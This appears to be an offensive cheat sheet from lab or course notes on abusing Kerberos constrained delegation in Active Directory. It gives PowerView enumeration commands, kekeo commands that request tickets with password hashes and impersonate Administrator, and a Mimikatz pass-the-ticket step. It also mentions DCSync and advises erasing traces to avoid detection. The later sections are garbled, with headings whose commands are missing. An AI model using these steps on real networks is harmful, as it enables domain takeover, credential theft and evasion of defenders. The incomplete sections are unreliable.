🟢Constrained Delegation

Enumerate users with contrained delegation enabled

Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Enumerate computers with contrained delegation enabled

Get-Domaincomputer -TrustedToAuth
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Constrained delegation User

Requesting TGT with kekeo

./kekeo.exe
Tgt::ask /user:<username> /domain:<domain> /rc4:<hash>

Requesting TGS with kekeo

Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local

Use Mimikatz to inject the TGS ticket

Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'

Constrained delegation Computer

Requesting TGT with a PC hash

./kekeo.exe
Tgt::ask /user:dcorp-adminsrv$ /domain:<domain> /rc4:<hash>

Requesting TGS

No validation for the SPN specified

Using mimikatz to inject TGS ticket and executing DCsync

Additional Enumeration Techniques

Discover additional services allowing delegation:

Further Exploitation

Extract and Use TGT

Using the extracted TGT for impersonation:

Then, using the ticket:

Execute Commands with the Impersonated Identity

Once ticket is injected, use it to execute commands:

Where $cred is a PSCredential object created with the credentials of any user you've impersonated.

Cleaning Up

Remember to remove any traces of your activities:

This ensures the removal of all Kerberos tickets from the current session and helps avoid detection.

Additional Resources

For more information on Kerberos delegation and related attacks, refer to the following resources:

• Microsoft Documentation on Kerberos Constrained Delegation

• Harmj0y's Guide to Kerberos Abuse